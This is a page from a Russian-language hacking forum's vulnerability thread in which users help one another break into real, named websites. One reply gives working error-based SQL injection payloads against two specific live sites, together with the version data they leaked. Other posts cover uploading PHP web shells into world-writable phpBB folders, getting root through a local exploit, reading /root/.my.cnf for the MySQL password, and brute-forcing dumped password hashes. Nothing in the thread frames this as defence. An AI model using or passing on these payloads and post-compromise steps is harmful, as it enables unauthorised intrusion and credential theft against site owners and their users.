HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2125 из 2438 « Первая < 11251625202520752115 2121 2122 2123 2124 2125 2126 2127 2128 2129 213521752225 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #21241  
Старый 19.08.2012, 14:15
blesse
Guest
Сообщений: n/a
Провел на форуме:
29647

Репутация: 1
По умолчанию
Цитата:
Сообщение от VY_CMa  
VY_CMa said:
"blesse" в пхпбб есть директории на которые по умолчанию права 777, что то вроде папки для аватаров и т.д. пробуй залиться туда.
Да ,но в них как правило запрет на исполнение пхп скриптов
 
Ответить с цитированием

  #21242  
Старый 20.08.2012, 18:35
foma9999
Новичок
Регистрация: 05.01.2010
Сообщений: 9
Провел на форуме:
13018

Репутация: 0
По умолчанию
А такую уязвимость вообще реально раскрутить? https://p-on.ru/admin/

и

http://www.alarmtrade.ru/search/?search=UNION+SELECT+ids+FROM+pages+WHER'

Хотелось бы знать как.
 
Ответить с цитированием

  #21243  
Старый 20.08.2012, 19:01
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию
по поводу p-on.ru:

в поле логин: ' or(1)group by(concat(version(),0x00,floor(rand(0)*2)))having( min(0)or(1))#)

message: Duplicate entry '5.0.45-community-nt' for key 1

по поводу: alarmtrade.ru:

Код:
Code:
http://www.alarmtrade.ru/search/?search='or(1)group/**/by(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))--+
Duplicate entry '5.1.58' for key 'group_key'
 
Ответить с цитированием

  #21244  
Старый 21.08.2012, 10:00
WendM
Guest
Сообщений: n/a
Провел на форуме:
11466

Репутация: 3
По умолчанию
Как достать пароль от mysql если есть доступ к корневой папке "/" ? Нашел там папку с апачем, но в нем по моему нету логин и пасс от mysql. В конфигах сайта через который лился только пользователь привязанный к бд сайта(( Там есть еще сайты, но смотреть каждый в лом.

И еще, как можно увидеть всю структуру сервера если залит шелл? Т.е все папки и под папки. Юзаю шелл 404

UPD. Нашел папку mysql, но зайти в нее не дает, есть ли варианты зайти в нее?
 
Ответить с цитированием

  #21245  
Старый 21.08.2012, 10:07
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию
Цитата:
Сообщение от WendM  
WendM said:
Как достать пароль от mysql если есть доступ к корневой папке "/" ? Нашел там папку с апачем, но в нем по моему нету логин и пасс от mysql. В конфигах сайта через который лился только пользователь привязанный к бд сайта(( Там есть еще сайты, но смотреть каждый в лом.
И еще, как можно увидеть всю структуру сервера если залит шелл? Т.е все папки и под папки. Юзаю шелл 404
UPD. Нашел папку mysql, но зайти в нее не дает, есть ли варианты зайти в нее?
Юзать root. Прокачай систему до 20 левела с помощью сплоита.
 
Ответить с цитированием

  #21246  
Старый 21.08.2012, 10:16
WendM
Guest
Сообщений: n/a
Провел на форуме:
11466

Репутация: 3
По умолчанию
Цитата:
Сообщение от VY_CMa  
VY_CMa said:
Юзать root. Прокачай систему до 20 левела с помощью сплоита.
?? Можно подробней
 
Ответить с цитированием

  #21247  
Старый 21.08.2012, 17:49
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию
Цитата:
Сообщение от VY_CMa  
VY_CMa said:
Юзать root. Прокачай систему до 20 левела с помощью сплоита.
вообще-то самый высокий уровень нулевой, а никак не 20

по сабжу, пароль от мюскл можно узнать в трех случаях:

имея рута на сервере и как правило пароль лежит тут: /root/.my.cnf

имея логин и пароль пользователя который не ограничен доступом в mysql.user, достал хеш рута => брут => профит

найти пароль в конфигах, логах, процессах
 
Ответить с цитированием

  #21248  
Старый 21.08.2012, 22:18
Unknown
Guest
Сообщений: n/a
Провел на форуме:
6070

Репутация: 5
По умолчанию
WendM

Не знаю как в шеле 404, но в wso есть возможность просто читать конкретный файл, если знаешь где папка MySQL то там же и конфиг, можешь прочитать конфиг на прямую.

НО нужно еще пасс расшифровать.

Или как писали если есть возможность заюзать сплоит и повысить права
 
Ответить с цитированием

  #21249  
Старый 22.08.2012, 04:57
WendM
Guest
Сообщений: n/a
Провел на форуме:
11466

Репутация: 3
По умолчанию
Цитата:
Сообщение от Teratex  
Teratex said:
WendM
Не знаю как в шеле 404, но в wso есть возможность просто читать конкретный файл, если знаешь где папка MySQL то там же и конфиг, можешь прочитать конфиг на прямую.
Цитата:
Сообщение от WendM  
WendM said:
Нашел папку mysql, но зайти в нее не дает,
 
Ответить с цитированием

  #21250  
Старый 22.08.2012, 05:00
WendM
Guest
Сообщений: n/a
Провел на форуме:
11466

Репутация: 3
По умолчанию
Ребята, вы так и не дали ответ на мой еще один вопрос. В каком шеле можно посмотреть дерево каталогов?, т.е все папки и под папки
 
Ответить с цитированием
Ответ
Страница 2125 из 2438 « Первая < 11251625202520752115 2121 2122 2123 2124 2125 2126 2127 2128 2129 213521752225 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ